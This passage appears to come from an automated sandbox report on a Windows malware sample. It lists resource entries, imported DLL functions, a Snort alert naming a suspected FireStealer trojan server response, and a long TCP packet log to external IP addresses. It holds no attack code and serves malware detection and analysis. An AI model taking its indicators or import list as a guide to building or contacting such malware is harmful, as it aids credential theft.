                                                                                                                                            RT_STRING0x7c3c80x110dataChineseChina0.625
                                                                                                                                            RT_STRING0x7c5480x24dataChineseChina0.4444444444444444
                                                                                                                                            RT_STRING0x7c5c00x30dataChineseChina0.625
                                                                                                                                            RT_GROUP_CURSOR0x7a6880x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina1.0294117647058822
                                                                                                                                            RT_GROUP_CURSOR0x7ae780x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7a7e80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7ad280x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7abd80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7b5080x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7aa880x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7b1180x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7a9380x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7afc80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7b2680x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7b3b80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7b6580x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7b7a80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_CURSOR0x7b8f80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                                                                                                                            RT_GROUP_ICON0x4e4180x14dataChineseChina1.15
                                                                                                                                            RT_GROUP_ICON0x4ecd80x14dataChineseChina1.25
                                                                                                                                            RT_VERSION0x4efc80x2e8dataChineseChina0.5631720430107527

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            KERNEL32.dllLockFile, UnlockFile, SetEndOfFile, DuplicateHandle, FindClose, FindFirstFileA, GetFullPathNameA, GetCPInfo, GetOEMCP, FileTimeToSystemTime, SetErrorMode, FileTimeToLocalFileTime, GetFileAttributesA, GetFileTime, GetTickCount, HeapAlloc, HeapFree, RtlUnwind, GetStartupInfoA, GetCommandLineA, RaiseException, GetSystemTimeAsFileTime, ExitProcess, TerminateProcess, HeapReAlloc, HeapSize, FlushFileBuffers, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, GetStdHandle, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, SetUnhandledExceptionFilter, GetStringTypeA, GetStringTypeW, GetCurrentProcessId, LCMapStringA, LCMapStringW, GetTimeZoneInformation, IsBadReadPtr, IsBadCodePtr, VirtualProtect, GetSystemInfo, VirtualQuery, SetStdHandle, SetEnvironmentVariableA, SetFilePointer, GlobalFlags, WritePrivateProfileStringA, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, GlobalDeleteAtom, lstrcmpA, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, SetLastError, GlobalFree, MulDiv, GlobalAlloc, GlobalLock, GlobalUnlock, GetModuleHandleA, GetProcAddress, FormatMessageA, LocalFree, CopyFileA, GetCurrentDirectoryA, FreeResource, OpenFile, GetCurrentProcess, SetPriorityClass, lstrcpynA, DeviceIoControl, ReadFile, GetFileSize, GetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetSystemDirectoryA, CreateFileA, WriteFile, CloseHandle, DeleteFileA, GetModuleFileNameA, LoadLibraryA, FreeLibrary, GetVolumeInformationA, OutputDebugStringA, DebugBreak, InterlockedIncrement, InterlockedDecrement, FindResourceA, LoadResource, LockResource, SizeofResource, lstrlenA, lstrcmpiA, CompareStringW, lstrlenW, CompareStringA, GetVersion, WideCharToMultiByte, MultiByteToWideChar, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, HeapDestroy, InterlockedExchange
                                                                                                                                            USER32.dllInvalidateRgn, SetCapture, ReleaseCapture, GetNextDlgGroupItem, MessageBeep, RegisterClipboardFormatA, PostThreadMessageA, GetForegroundWindow, GetTopWindow, UnhookWindowsHookEx, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, GetSysColor, AdjustWindowRectEx, EqualRect, GetClassInfoA, RegisterClassA, UnregisterClassA, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, CopyRect, PtInRect, GetWindow, SetWindowContextHelpId, MapDialogRect, SetWindowPos, GetDesktopWindow, SetActiveWindow, EndPaint, DestroyWindow, IsWindow, InvalidateRect, GetNextDlgTabItem, EndDialog, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, GetParent, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, SetCursor, PostMessageA, PostQuitMessage, wsprintfA, GetMenuState, GetMenuItemID, GetMenuItemCount, CharLowerA, CharUpperA, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GetSubMenu, MessageBoxA, CharNextA, wvsprintfA, GetSystemMetrics, LoadIconA, EnableWindow, GetClientRect, IsIconic, GetSystemMenu, SendMessageA, AppendMenuA, CopyAcceleratorTableA, SetRect, IsRectEmpty, DrawIcon, LoadCursorA, GetDlgItem, GetSysColorBrush, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, DestroyMenu, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, SetFocus, IsChild, GetWindowTextLengthA, CreateDialogIndirectParamA, GetWindowTextA, GetMessageTime
                                                                                                                                            GDI32.dllSetMapMode, DeleteObject, GetViewportExtEx, GetWindowExtEx, PtVisible, RectVisible, TextOutA, Escape, SelectObject, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, ExtSelectClipRgn, DeleteDC, GetStockObject, GetBkColor, GetTextColor, CreateRectRgnIndirect, GetRgnBox, GetMapMode, RestoreDC, SaveDC, ExtTextOutA, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetDeviceCaps
                                                                                                                                            comdlg32.dllGetFileTitleA
                                                                                                                                            WINSPOOL.DRVClosePrinter, DocumentPropertiesA, OpenPrinterA
                                                                                                                                            ADVAPI32.dllRegEnumKeyA, RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegCloseKey, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA
                                                                                                                                            COMCTL32.dll
                                                                                                                                            SHLWAPI.dllPathFindExtensionA, PathFindFileNameA, PathStripToRootA, PathIsUNCA
                                                                                                                                            oledlg.dll
                                                                                                                                            ole32.dllCreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoTaskMemAlloc, OleInitialize, OleUninitialize, CoTaskMemFree, CoCreateInstance, CoSetProxyBlanket, CoInitialize, CoUninitialize, CoRevokeClassObject, OleIsCurrentClipboard, OleFlushClipboard, CoFreeUnusedLibraries, CoRegisterMessageFilter
                                                                                                                                            OLEAUT32.dllVariantInit, SysAllocStringLen, VariantClear, VariantChangeType, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, VariantCopy, SysAllocString, SysFreeString
                                                                                                                                            iphlpapi.dllGetAdaptersInfo
                                                                                                                                            OLEACC.dllLresultFromObject, CreateStdAccessibleObject

                                                                                                                                            Possible Origin

                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            ChineseChina

                                                                                                                                            Network Behavior

                                                                                                                                            Snort IDS Alerts

                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                            05/05/24-00:24:50.450010TCP2051909ET TROJAN Win32/FireStealer Related Server Response8049789144.208.127.230192.168.11.20

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            May 5, 2024 00:24:47.904021978 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                            May 5, 2024 00:24:47.904131889 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                            May 5, 2024 00:24:47.904324055 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                            May 5, 2024 00:24:47.906574965 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                            May 5, 2024 00:24:47.906646967 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                            May 5, 2024 00:24:48.118782997 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                            May 5, 2024 00:24:48.119072914 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                            May 5, 2024 00:24:48.120646954 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                            May 5, 2024 00:24:48.120656013 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                            May 5, 2024 00:24:48.120851994 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                            May 5, 2024 00:24:48.152481079 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                            May 5, 2024 00:24:48.196245909 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                            May 5, 2024 00:24:48.459268093 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                            May 5, 2024 00:24:48.459501028 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                            May 5, 2024 00:24:48.459741116 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                            May 5, 2024 00:24:48.460419893 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                            May 5, 2024 00:24:48.460481882 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                            May 5, 2024 00:24:48.460628033 CEST49788443192.168.11.20172.67.74.152
                                                                                                                                            May 5, 2024 00:24:48.460686922 CEST44349788172.67.74.152192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.109848976 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.215768099 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.216002941 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.216104031 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.216152906 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.320934057 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.320976019 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.450010061 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.450088978 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.450146914 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.450248957 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.450306892 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.450361967 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.450412035 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.450428009 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.450566053 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.502199888 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.615658998 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.615658998 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.720161915 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.720295906 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.746968031 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.784807920 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.784807920 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.889528036 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.913850069 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.955168009 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.960611105 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:50.960611105 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.064706087 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:51.089246988 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:51.138124943 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.138124943 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.242675066 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:51.273591042 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:51.314446926 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.344860077 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.344860077 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.449444056 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:51.474955082 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:51.517565966 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.581295013 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.581295013 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.685782909 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:51.720448017 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:51.754550934 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.754550934 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.859148026 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:51.886817932 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:51.939325094 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.993621111 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:51.993621111 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.098404884 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:52.130491972 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:52.173640966 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.209886074 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.209886074 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.314246893 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:52.350059032 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:52.392358065 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.440471888 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.440471888 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.545001030 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:52.572115898 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:52.626641989 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.687793016 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.687793016 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.792337894 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:52.820131063 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:52.861021996 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.944320917 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:52.944320917 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.049401999 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:53.075536013 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:53.126554966 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.186395884 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.186395884 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.291074038 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:53.317679882 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:53.360930920 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.392790079 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.392791033 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.497431040 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:53.543199062 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:53.595208883 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.618834972 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.618834972 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.723355055 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:53.751441956 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:53.798261881 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.826003075 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.826004028 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:53.930629015 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:53.958475113 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:54.001373053 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.029484987 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.029484987 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.133886099 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:54.167054892 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:54.220105886 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.272589922 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.272589922 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.376998901 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:54.422990084 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:54.470036030 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.486279011 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.486279011 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.590747118 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:54.623517990 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:54.673110962 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.725047112 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.725048065 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.829422951 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:54.859028101 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:54.907481909 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.956692934 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:54.956693888 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.061168909 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.100518942 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.102848053 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.102849007 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.207528114 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.245388985 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.247212887 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.247214079 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.351927042 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.399734974 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.401648045 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.401648045 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.506419897 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.542815924 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.544415951 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.544415951 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.649034977 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.685813904 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.687386036 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.687438965 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.791846991 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.816900015 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.818664074 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.818664074 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.923315048 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.953720093 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:55.957369089 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:55.957369089 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.062458038 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.088408947 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.090285063 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.090285063 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.198144913 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.228220940 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.229861975 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.229861975 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.334721088 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.372591019 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.374567032 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.374567032 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.479279995 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.522296906 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.524049044 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.524049044 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.628483057 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.664613008 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.666251898 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.666251898 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.770798922 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.794918060 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.797039986 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.797039986 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.901638031 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.939390898 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:56.941421032 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:56.941421032 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.046119928 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:57.083237886 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:57.085170031 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.085170031 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.189697027 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:57.226768017 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:57.228637934 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.228637934 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.333324909 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:57.362283945 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:57.364016056 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.364017010 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.468729973 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:57.493560076 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:57.495294094 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.495294094 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.600059986 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:57.628474951 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:57.630544901 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.630544901 CEST4978980192.168.11.20144.208.127.230
                                                                                                                                            May 5, 2024 00:24:57.735157013 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:57.769421101 CEST8049789144.208.127.230192.168.11.20
